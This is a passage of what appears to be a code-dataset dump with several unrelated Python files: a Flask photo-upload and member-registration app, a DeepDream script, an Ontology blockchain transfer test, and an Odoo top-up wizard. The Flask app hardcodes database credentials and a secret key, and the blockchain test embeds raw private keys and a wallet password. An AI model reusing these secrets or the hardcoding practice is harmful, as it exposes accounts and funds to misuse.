flask import Flask, request, render_template, flash, redirect, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class\nfrom flask_wtf import FlaskForm\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed \nimport re\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import Member, db, Image\nfrom wtforms import validators\nfrom forms import MemberForm, ImageForm, ImageSearch\nimport flask\nimport os\nfrom tables import Image_Results\nimport secrets\nfrom flask_login import current_user\n\nbasedirectory = os.path.abspath(os.path.dirname(__file__))#basedir to use in imageloading\n\napp = Flask(__name__)\n\nuserpass = 'mysql+pymysql://joshlufafa:fhdu23AJ8j3hmvbluf@'\nbasedir = 
'127.0.0.1'\n# change to YOUR database name, with a slash added as shown\ndbname = '/kyambogosda'\n# this socket is going to be very different on a Windows computer\n#socket = '?unix_socket=/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock'\n\n\n# put them all together as a string that shows SQLAlchemy where the database is\napp.config['SQLALCHEMY_DATABASE_URI'] = userpass + basedir + dbname\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = 'Agdgajj938n2!gjjskg@;[pbqbktofd'\n\napp.config['UPLOADED_PHOTOS_DEST'] = os.path.join(basedirectory, 'static/img') # you'll need to create a folder named uploads\n\nPHOTO_FOLDER = os.path.join('static', 'img')\napp.config['UPLOAD_FOLDER'] = PHOTO_FOLDER\n#db = SQLAlchemy(app)#initialise the database configuration\n\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\npatch_request_class(app) # set maximum file size, default is 16MB\n\n # class UploadForm(FlaskForm):\n # image = FileField(u'Image File', [validators.regexp(r'^[^/\\\\]\\.jpg$')])\n # description = TextAreaField(u'Image Description')\n\n # def validate_image(form, field):\n # if field.data:\n # field.data = re.sub(r'[^a-z0-9_.-]', '_', field.data)\n\ndb = SQLAlchemy(app)\n\n\nclass UploadForm(FlaskForm):\n photo = FileField(validators=[FileAllowed(['png', 'jpg']), FileRequired('File was empty!')])\n \n\n@app.route('/image_final', methods=['GET', 'POST'])#Use this method to test the us of this field with other form fields\ndef upload_file():\n image = Image()\n form = ImageForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n if form.validate_on_submit():\n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n image.image_file = picture_fn#Dont forget to change the image path if it workd later on\n image.name = form.name.data\n db.session.add(image)\n db.session.commit()\n else:\n file_url = None\n\n return render_template('image_final.html', form=form, file_url=file_url)\n\n@app.route('/edit-image', methods=['GET', 'POST'])\ndef edit():\n image = Image()#\n form = ImageForm()\n qry = db.session.query(Image).filter(Image.name.contains(\"oben\"))\n image_fn = qry.first()#result from the query \n image_file = url_for('static', filename='img/' + image_fn.image_file)#\n\n if form.validate_on_submit():\n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n image_fn.image_file = picture_fn#Dont forget to change the image path if it workd later on\n #image_fn.name = form.name.data\n #db.session.add(image)\n db.session.commit()\n else:\n file_url = None\n return render_template('edit-image.html', form=form, file_url=file_url, image_file=image_file)\n \n@app.route('/image-result', methods=['GET', 'POST'])\ndef view_image():\n image = Image()#\n qry = db.session.query(Image).filter(Image.name.contains(\"oben\"))\n image_fn = qry.first()#result from the query \n\n image_file = url_for('static', filename='img/' + image_fn.image_file)#This concatenates the image iflename and extension to the static/img folder where the images are uploaded and saved \n full_filename = os.path.join(app.config['UPLOAD_FOLDER'], image_fn.image_file) #this is the filepath 
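The splitext/recombine step in the routes above (picture_fn = f_name + f_ext) reassembles exactly the filename it started with; when the goal is a collision-resistant name, the save_picture helper further down this file shows the usual pattern of a random hex stem plus the original extension. A standalone sketch of that idea:

import os
import secrets

def random_name(original_filename):
    # Random 16-hex-digit stem; the original extension is kept so the
    # browser still infers the right content type.
    _, f_ext = os.path.splitext(original_filename)
    return secrets.token_hex(8) + f_ext

print(random_name("avatar.png"))  # e.g. '3f9c1b2a4d5e6f70.png'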
to the image displayed in the html template \n return render_template('image-result.html', image_file=image_file)\n\ndef save(member, form, picture_fn, new=False):#member args to pass data to our, form is the argument to pass the data to the member model\n member.image_file = picture_fn#The filename is the picture filename from the caller function new_member\n member.full_name = form.full_name.data\n member.gender = form.gender.data \n member.date_added = form.date_added.data \n member.telephone_no = form.telephone_no.data \n member.address = form.address.data \n member.a_o_residence = form.a_o_residence.data \n member.d_o_birth = form.d_o_birth.data\n member.age = form.age.data \n member.m_status = form.m_status.data \n member.no_children = form.no_children.data \n member.occupation = form.occupation.data \n member.l_o_educ = form.l_o_educ.data \n member.p_o_work = form.p_o_work.data\n member.employer = form.employer.data \n member.nationality = form.nationality.data\n member.tribe = form.tribe.data\n member.clan = form.clan.data\n member.ch_born = form.ch_born.data \n member.f_faith = form.f_faith.data\n member.d_o_baptism = form.d_o_baptism.data\n member.ch_of_baptism = form.ch_of_baptism.data\n member.ch_family = form.ch_family.data\n member.l_o_AY = form.l_o_AY.data \n member.lang_spoken = form.lang_spoken.data\n member.skills = form.skills.data \n member.inc_projects = form.inc_projects.data \n member.hobbies = form.hobbies.data\n member.ch_programs = form.ch_programs.data\n \n if new:\n db.session.add(member)\n db.session.commit()#s\n\n\n@app.route('/image_load', methods=['GET', 'POST'])#Use this method to test the us of this field with other form fields\ndef reister():\n form = MemberForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n #form = UploadForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n if request.method == 'POST' and form.validate_on_submit():\n member = Member()#Instantiate the member model \n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n #member.image_file = picture_fn\n save(member, form, picture_fn, new=True)#The picture filename is passed as an arguement to the save function\n flash(\"Successfully created new member\")\n \n else:\n file_url = None\n\n return render_template('image_load.html', form=form, file_url=file_url)\n \n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename) \n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/img', picture_fn)\n form_picture.save(picture_path) \n\n return picture_fn\n\n\n@app.route('/image', methods=['GET', 'POST'])\ndef test():\n form = ImageForm()\n image = Image()\n if form.validate_on_submit():\n if form.photo.data:\n picture_file = save_picture(form.photo.data)\n image.image_file = picture_file\n image.name = form.name.data\n db.session.add(image)\n db.session.commit()\n \n #image_file = url_for('static', filename='img' + image_f) \n return render_template('image.html', form=form)\n\nif __name__ == '__main__':\n app.run()","sub_path":"final_app/application/imagetest.py","file_name":"imagetest.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9106484","text":"class Group(db.Model, TimestampMixin):\n \"\"\"A 
group is a collection of users who are either members or invited.\n Groups are created when a member not in a group invites another member.\n Invited members may accept or decline invitations. Active members may\n revoke invitations and remove members (including themselves).\n A group must have at least 2 participants.\n Degenerate groups are deleted.\n \"\"\"\n id = db.Column(db.Integer(), primary_key=True)\n assignment_id = db.Column(db.ForeignKey(\"assignment.id\"), nullable=False)\n\n assignment = db.relationship(\"Assignment\")\n\n","sub_path":"callgraph/parse/codes/94.py","file_name":"94.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129889062","text":"# import necessary packages\nfrom keras.applications import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import load_img\nfrom keras import backend as K\nfrom scipy import ndimage\nimport numpy as np\nimport argparse\nimport cv2\n\ndef preprocess(p):\n # load the input image and convert it to a keras-compatible\n # format. Expand the dimensions so we can pass it through the\n # model, and finaly preprocess it for input to inception network\n image = load_img(p)\n image = img_to_array(image)\n image = np.expand_dims(image, axis=0)\n image = preprocess_input(image)\n\n # return the preprocessed image\n return image\n\ndef deprocess(p):\n # we are using channels last ordering\n image = image.reshape((image.shape[1], image.shape[2], 3))\n\n # undo the preprocessing\n image /= 255\n image += 0.5\n image *= 255\n image = np.clip(image, 0, 255).astype(\"uint8\")\n\n # we have been processing images in RGB, so convert\n # to BGR for OpenCV\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # return the deprocessed image\n return image\n\ndef fetchLossGrads(X):\n pass\n\ndef resize_image(image, size):\n # resize the image\n resized = np.copy(image)\n resized = ndimage.zoom(resized,\n (1, float(size[0]) / resized.shape[1],\n float(size[1]) / resized.shape[2], 1), order=1)\n\n # return the resized image\n return resized\n\ndef eval_loss_and_gradients(X):\n # fetch the loss and gradients given the input\n output = fetchLossGrads([X])\n (loss, G) = (output[0], output[1])\n\n # return tuple of loss and gradients\n return (loss, G)\n\ndef gradient_ascent(X, iters, alpha, maxLoss=-np.inf):\n # loop over our number of iterations\n for i in range(0, iters):\n # compute the loss and gradient\n (loss, G) = eval_loss_and_gradients(X)\n\n # if the loss is greater than the max loss, break from\n # the loop early to prevent strange effects\n if loss > maxLoss:\n break\n\n # take a step\n print(\"[INFO] Loss at {}: {}\".format(i, loss))\n X += alpha*G\n\n # return the output of gradient ascent\n return X\n\n# ***********************************************************************************\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n help=\"path to the input image\")\nap.add_argument(\"-o\", \"--output\", required=True,\n help=\"path to the output image\")\nargs = vars(ap.parse_args())\n\n# define the dictionnary that include (1) the layers we are\n# going to use for the dreams and (2) their respective weights\n# (i.e the larger the weights, the more the layer is contributing)\nLAYERS = {\n \"mixed2\" : 2.0,\n \"mixed3\" : 5.0\n}\n\n# define the number of octaves, octave scale, alpha (step for 
gradient\n# ascent), number of iterations and max loss --tweaking theses values\n# will produce different dreams\nNUM_OCTAVE = 3\nOCTAVE_SCALE = 1.4\nALPHA = 0.001\nNUM_ITERS = 50\nMAX_LOSS = 10.0\n\n# indicate that keras *should not* be update the weights of any\n# layer during the deep dream\nK.set_learning_phase(0)\n\n# load the pre-trained Inception model from disk, then grab\n# reference variable to the input tensor of the model (which we'll\n# then be using to perform our CNN hallucinations)\nprint(\"[INFO] loading InceptionV3 model...\")\nmodel = InceptionV3(weights=\"imagenet\", include_top=False)\ndream = model.input\n\n# define the loss value, then build the dictionnary that maps the\n# *name* of each layer inside the Inception to the actual *layer*\n# object itself -- we'll need this mapping when building the loss\n# of the dreams\nloss = K.variable(0.0)\nlayerMap = {layer.name: layer for layer in model.layers}\n\n# loop over the layers that will be utilized in the dream\nfor layerName in LAYERS:\n # grab the output of the layer we will use for dreaming, then\n # add the L2-norm on the features to the layer to the loss (we\n # use array slicing here to avoid border artifacts caused by\n # border pixels)\n x = layerMap[layerName].output\n coeff = LAYERS[layerName]\n scaling = K.prod(K.cast(K.shape(x), \"float32\"))\n loss += coeff * K.sum(K.square(x[:, 2:-2, 2:-2, :])) / scaling\n\n# compute the gradients\ngrads = K.gradients(loss, dream)[0]\ngrads /= K.maximum(K.mean(K.abs(grads)), 1e-7)\n\n# define a function that can retrieve the value of the loss\n# and the gradients given an input image\noutputs = [loss, grads]\nfetchLossGrads = K.function([dream], outputs)\n\n# load and preprocess the input image, then grab the (original) input\n# height and width\nimage = preprocess(args[\"image\"])\ndims = image.shape[1:3]\n\n# in order to perform deep dreaming we need to build multiple scales\n# of the original input image (i.e set of images at lower and lower resolutions)\n# -- this list stores the spatial dimensions that we will be resizing our image to\noctaveDims = [dims]\n\n# loop over the octaves (resolutions)\nfor i in range (1, NUM_OCTAVE):\n # compute the spatial dimensions (i.e width and height) for the\n # current octave, then update the dimensions list\n size = [int(d / (OCTAVE_SCALE ** i)) for d in dims]\n octaveDims.append(size)\n\n# reverse the octave dimensions list order so the smallest\n# is at first position\noctaveDims = octaveDims[::-1]\n\n# clone the original image and then create a resized input image\n# that matches the smallest dimension\norig = np.copy(image)\nshrunk = resize_image(image, octaveDims[0])\n\n# loop over the octave dimensions from smallest to largest\nfor (o, size) in enumerate(octaveDims):\n # resize the image and then apply gradient ascent\n print(\"[INFO] starting octave {}...\".format(o))\n image = resize_image(image, size)\n image = gradient_ascent(image, iters=NUM_ITERS, alpha=ALPHA,\n maxLoss=MAX_LOSS)\n\n # to compute the lost details we need two images :\n # (1) the shrunk image that has been upscaled to the current octave\n # (2) the original image that has been downscaled to the current octave\n upscaled = resize_image(shrunk, size)\n downscaled = resize_image(orig, size)\n\n # the lost detail is computed via a simple subtraction which we\n #immediately back in to the image we applied gradient ascent on\n lost = downscaled - upscaled\n image += lost\n\n # make the original image be the new shrunk image so we can\n #repeat the process\n 
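A side note on the deprocess helper near the top of this script: it names its parameter p but operates on an undefined image variable, and it divides by 255 where undoing Inception's preprocessing (which maps pixels into [-1, 1]) calls for dividing by 2. A corrected sketch under that reading, keeping the script's channels-last assumption:

import numpy as np
import cv2

def deprocess(image):
    # Drop the batch dimension, invert the [-1, 1] Inception scaling
    # (x/2 + 0.5, then back to 0-255), and convert RGB -> BGR for OpenCV.
    image = image.reshape((image.shape[1], image.shape[2], 3))
    image /= 2.0
    image += 0.5
    image *= 255.0
    image = np.clip(image, 0, 255).astype("uint8")
    return cv2.cvtColor(image, cv2.COLOR_RGB2BGR)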
shrunk = resize_image(orig, size)\n\n# deprocess image, show it and write it to disk\nimage = deprocess(image)\ncv2.imshow(\"DeepDrem\", image)\ncv2.imwrite(args[\"output\"], image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"DNN/dnn-nst/deepdream.py","file_name":"deepdream.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"497282875","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport unittest\nimport base58\nimport base64\nimport binascii\n\n\nfrom ontology.utils import util\nfrom ontology.common.define import *\nfrom ontology.common.address import Address\nfrom ontology.account.account import Account\nfrom ontology.ont_sdk import OntologySdk\nfrom ontology.crypto.signature_scheme import SignatureScheme\nfrom ontology.smart_contract.native_contract.asset import Asset\nfrom ontology.crypto.signature_scheme import SignatureScheme\nfrom ontology.core.transaction import Transaction\nfrom ontology.vm.build_vm import build_native_invoke_code, build_neo_vm_param\nfrom ontology.smart_contract.neo_vm import NeoVm\nfrom ontology.smart_contract.neo_contract.abi.build_params import BuildParams\nfrom ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction\n\n#rpc_address = \"http://polaris3.ont.io:20336\"\nrpc_address = \"http://127.0.0.1:20336\"\nsdk = OntologySdk()\n#sdk.rpc.set_address(rpc_address)\nsdk.set_rpc((rpc_address))\nprivate_key = \"523c5fcf74823831756f0bcb3634234f10b3beb1c05595058534577752ad2d9f\"\nprivate_key2 = \"75de8489fcb2dcaf2ef3cd607feffde18789de7da129b5e97c81e001793cb7cf\"\nprivate_key3 = \"1383ed1fe570b6673351f1a30a66b21204918ef8f673e864769fa2a653401114\"\nacc = Account(private_key, SignatureScheme.SHA256withECDSA)\nacc2 = Account(private_key2, SignatureScheme.SHA256withECDSA)\nacc3 = Account(private_key3, SignatureScheme.SHA256withECDSA)\n\n\nclass TestAsset(unittest.TestCase):\n def test_aaa(self):\n bytearray.fromhex(\"87986fa27ad23c1bdf76373a7e5ddd727232a49f138d26d37435f79126273c8f\")\n def test_a(self):\n tx_hash='2425f5b29766ece045fc3967ec18d56a2c9c23650541c6a3850b8037fb613b22'\n event=sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n print(event)\n\n\n def test_transfer_Ont(self):\n wallet_path = \"C:\\\\Go_WorkSpace\\\\src\\\\github.com\\\\ontio\\\\ontology\\\\_Wallet_\\\\wallet.dat\"\n sdk.wallet_manager.open_wallet(wallet_path)\n acct1_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n acct1_pwd = \"xinhao\"\n acct1 = sdk.wallet_manager.get_account(acct1_addr, acct1_pwd)\n # export several keys\n wif_key = acct1.export_wif()\n print(\"wif_key is \", wif_key)\n private_key_bytes = acct1.get_privatekey_from_wif(wif_key)\n print(\"private_key_bytes is \", private_key_bytes, type(private_key_bytes))\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str)\n\n contract_address_str = \"0000000000000000000000000000000000000001\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n # contract_address.reverse()\n print(\"my converted contract_address is \", contract_address)\n print(\"the givencontract_address is \", ONT_CONTRACT_ADDRESS)\n\n print('contract_address is ', contract_address)\n mybalance_1 = sdk.rpc.get_balance(acct1.get_address_base58())\n print(\"acc wif_key is \", acc.export_wif())\n\n from_acc = acct1\n to_acc = acc\n asset = \"ong\"\n balance_1 = sdk.rpc.get_balance(from_acc.get_address_base58())\n 
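This test file repeatedly turns a hex contract-address string into a reversed bytearray, because NeoVM treats script hashes as little-endian when building invoke code. A standalone sketch of that conversion:

def contract_address_from_hex(hex_str):
    # Hex script-hash string -> little-endian bytearray, the same
    # fromhex-then-reverse dance the tests inline several times.
    addr = bytearray.fromhex(hex_str)
    addr.reverse()
    return addr

addr = contract_address_from_hex("f328cb02bb1bd3a25c32f3db9b5f20b6fc4e04ea")
print(addr.hex())  # ea044efcb6205f9bdbf3325ca2d31bbb02cb28f3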
print(\"mybalance_1 is \", mybalance_1)\n print(\"balance_1 is \", balance_1)\n ass = Asset(sdk)\n from_addr = from_acc.get_address_base58()\n to_addr = to_acc.get_address_base58()\n print(\"Transfer from \" + from_addr + \" to \" + to_addr)\n amount = int(int(balance_1[asset])/2)\n print(\"amount is \", amount, type(amount))\n payer = acct1.get_address_base58()\n gaslimit = 20000\n gasprice = 500\n\n # print('ong balance is ', sdk.rpc.get_balance(from_acc.get_address_base58()))\n # # int(ass.unbound_ong(from_addr))\n # ass.send_withdraw_ong_transaction(from_acc, to_addr, 100, to_acc,gaslimit, gasprice)\n #\n # print('ong balance is ', sdk.rpc.get_balance(from_acc.get_address_base58()))\n\n tx = ass.new_transfer_transaction(asset,from_addr, to_addr, amount, payer, gaslimit, gasprice)\n sdk.sign_transaction(tx, acct1)\n # sdk.sign_transaction(tx, to_acc)\n res = sdk.rpc.send_raw_transaction(tx)\n print(\"res in test_transfer_Ont is \", res)\n\n\n\n def test_open_wallet_account_from_path(self):\n ''' Open wallet and get account'''\n # wallet_path = \"C:\\\\Go_WorkSpace\\\\src\\\\github.com\\\\ontio\\\\ontology\\\\_Wallet_\\\\wallet.dat\"\n wallet_path = \"D:\\\\SmartX_accounts\\\\Cyano Wallet\\\\testnet\\\\mywallet1\\\\\"\n sdk.wallet_manager.open_wallet(wallet_path)\n acct1_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n acct2_addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n acct3_addr = \"AWf8NiLzXSDf1JB2Ae6YUKSHke4yLHMVCm\"\n acct1_pwd = \"xinhao\"\n acct1 = sdk.wallet_manager.get_account(acct1_addr, acct1_pwd)\n acct2 = sdk.wallet_manager.get_account(acct2_addr, acct1_pwd)\n acct3 = sdk.wallet_manager.get_account(acct3_addr, acct1_pwd)\n '''export several keys'''\n account = acct3\n wif_key = account.export_wif()\n print(\"wif_key is \", wif_key)\n private_key_bytes = account.get_privatekey_from_wif(wif_key)\n print(\"private_key_bytes is \", private_key_bytes, type(private_key_bytes))\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str, type(private_key_str))\n\n\n pwd = acct1_pwd\n addr = \"ANjLDUU9htLKe41yxzVKpiPmFNseA3N9gc\"\n salt = \"XeK1Nkv8F8qKxXtLEPSbRw==\"\n nounce = 16384\n scheme = SignatureScheme.SHA256withECDSA\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str, type(private_key_str))\n ''' send transaction without signer'''\n version = 0\n tx_type = 0xd1\n unix_time_now = int(time.time())\n nonce = unix_time_now\n gas_price = 0\n gas_limit = 20000\n payer = None\n payload = None\n attributes = None\n sigs = None\n hash = None\n '''\n contract_address_str = \"749a701ae89c0dbdab9b4b660ba84ee478004219\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n contract_address.reverse()\n print('contract_address is ', contract_address)\n '''\n '''\n contract_address = util.get_asset_address(\"ont\")\n #state = [{\"address\": \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\", \"to\": \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\", \"amount\": 10000}]\n b58_address = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n raw_address = Address.b58decode(b58_address)\n #sdk.neo_vm().send_transaction(contract_address, acct1,[],20000, 0, )\n invoke_code = build_native_invoke_code(contract_address, bytes([0]), \"balanceOf\", raw_address)\n payer = raw_address\n tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer, invoke_code, bytearray(), [], bytearray())\n #Transaction(0, 0xd1, unix_time_now, 0, 0, payer, invoke_code, bytearray(), [], bytearray())\n res = 
sdk.rpc.send_raw_transaction_pre_exec(tx)\n print('res is ', res)\n '''\n\n # Check balanceOf through NeoVm.make_invoke_transaction\n contract_address_str = \"f328cb02bb1bd3a25c32f3db9b5f20b6fc4e04ea\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n contract_address.reverse()\n print('contract_address is ', contract_address)\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"BalanceOf is \", res)\n\n # # Check totalsupply\n # params_list = []\n # params_list.append(str(\"totalSupply\").encode())\n # param = [10]\n # params_list.append(param)\n # params = BuildParams.create_code_params_script(params_list)\n # # when pre-execute, don't use 0x67\n # tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n # res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n # print('totalsupply is ', res)\n #\n # # Transfer through Transaction, send_raw_transaction\n # params_list = []\n # params_list.append(str(\"transfer\").encode())\n # from_addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n # to_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n # value = 100\n # param = []\n # param.append(Address.b58decode(from_addr).to_array())\n # param.append(Address.b58decode(to_addr).to_array())\n # param.append(value)\n # params_list.append(param)\n # params = BuildParams.create_code_params_script(params_list)\n # # when execute, use 0x67, then add the contract_address\n # params.append(0x67)\n # for i in contract_address:\n # params.append(i)\n # payer_raw_address = acct2.get_address().to_array()\n # payer_acct = acc2\n # unix_time_now = int(time.time())\n # tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer_raw_address, params, bytearray(), [], bytearray())\n # sdk.sign_transaction(tx, acct2)\n # #sdk.add_sign_transaction(tx, payer_acct)\n # sdk.rpc.send_raw_transaction(tx)\n # # # Transfer through send_Transaction\n # # balance_Of_Addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n # # func = AbiFunction(\"balanceOf\", \"Integer\", [])\n # # func.set_params_value((binascii.a2b_hex(balance_Of_Addr)))\n # # balance = sdk.neo_vm().send_transaction(contract_address, None, None, 0, 0, func, True)\n # # Transfer through Transaction, send_raw_transaction\n\n ### check balance before transferMulti###\n print('### check balance Before transferMulti ###')\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"before TransferMulti, the balance is \", res)\n\n ### transferMulti\n params_list = []\n params_list.append(str(\"TransferMulti\").encode())\n from_addr1 = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n from_addr2 = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n 
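The BalanceOf pre-execution block is pasted several times in this test (once standalone, once before TransferMulti, once after); it factors naturally into a helper. A sketch using only calls the test already exercises (Address.b58decode, BuildParams.create_code_params_script, NeoVm.make_invoke_transaction, send_raw_transaction_pre_exec):

def balance_of(sdk, contract_address, b58_address):
    # Pre-executed BalanceOf: no 0x67 APPCALL suffix and no signer needed.
    params_list = ["BalanceOf".encode(), [Address.b58decode(b58_address).to_array()]]
    params = BuildParams.create_code_params_script(params_list)
    tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)
    return sdk.rpc.send_raw_transaction_pre_exec(tx)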
to_addr1 = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n to_addr2 = \"AWf8NiLzXSDf1JB2Ae6YUKSHke4yLHMVCm\"\n value1 = 10000\n value2 = 10000\n param1 = []\n param1.append(Address.b58decode(from_addr1).to_array())\n param1.append(Address.b58decode(to_addr1).to_array())\n param1.append(value1)\n param2 = []\n param2.append(Address.b58decode(from_addr2).to_array())\n param2.append(Address.b58decode(to_addr2).to_array())\n param2.append(value2)\n params_list_tmp = []\n params_list_tmp.append(param1)\n params_list_tmp.append(param2)\n params_list.append(params_list_tmp)\n # params_list.append(param1)\n # params_list.append(param2)\n print(\" params_list is \", params_list)\n print(\" contract_address is \", contract_address)\n params = BuildParams.create_code_params_script(params_list)\n # when execute, use 0x67, then add the contract_address\n params.append(0x67)\n for i in contract_address:\n params.append(i)\n payer_raw_address = acct1.get_address().to_array()\n unix_time_now = int(time.time())\n tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer_raw_address, params, bytearray(), [],\n bytearray())\n tx = sdk.sign_transaction(tx, acct1)\n # sdk.add_sign_transaction(tx, payer_acct)\n tx_hash = sdk.rpc.send_raw_transaction(tx)\n print('tx_hash is ', tx_hash)\n time.sleep(12)\n event=sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n # event = sdk.rpc.get_block_by_hash(tx_hash)\n print(\"event is \", event)\n # print(\"tx_hash is \", tx_hash)\n # event = sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n # print(\"event is \", event)\n\n\n #check balance After transferMulti\n print('### check balance After transferMulti ###')\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"After TransferMulti, the balance is \", res)\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457165438","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\nclass PersebayaTopup(models.Model):\n\t_name = 'persebaya.topup'\n\t_inherit = ['mail.thread', 'ir.needaction_mixin']\n\n\tnik = fields.Char(string=\"NIK\",size=16)\n\tnama = fields.Many2one('res.partner',string=\"Name\",readonly=True)\n\tsaldo_terkini = fields.Integer(related='nama.saldo',string=\"Coin\",readonly=True,store=True)\n\ttopup = fields.Integer(string=\"Top Up Value\")\n\n\t@api.onchange('nik')\n\tdef _get_partner(self):\n\t\tif self.nik:\n\t\t\tpartner_id = self.env['res.partner'].search([('nik','=',self.nik)])\n\t\t\tself.nama = partner_id.id\n\n\tdef proses_top_up(self):\n\t\tif self.topup > 1000000:\n\t\t\tpartner_id = self.env['res.partner'].search([('nik','=',self.nik)])\n\t\t\tsaldo = partner_id.saldo + self.topup\n\t\t\tpartner_id.write({'saldo' : saldo})","sub_path":"wizard/top_up.py","file_name":"top_up.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
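In the Odoo top-up wizard above, search() on nik can match several res.partner records, and reading .id or .saldo on a multi-record set raises; limit=1 pins the lookup to a singleton. (Whether the self.topup > 1000000 guard is meant to gate large top-ups or is inverted is not decidable from this file, so it is left alone.) A sketch of the lookup fix, meant as a drop-in inside the same persebaya.topup model:

@api.onchange('nik')
def _get_partner(self):
    # limit=1 guarantees a singleton recordset, so .id is safe even if
    # NIK is not unique in res.partner.
    if self.nik:
        partner = self.env['res.partner'].search([('nik', '=', self.nik)], limit=1)
        self.nama = partner.id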
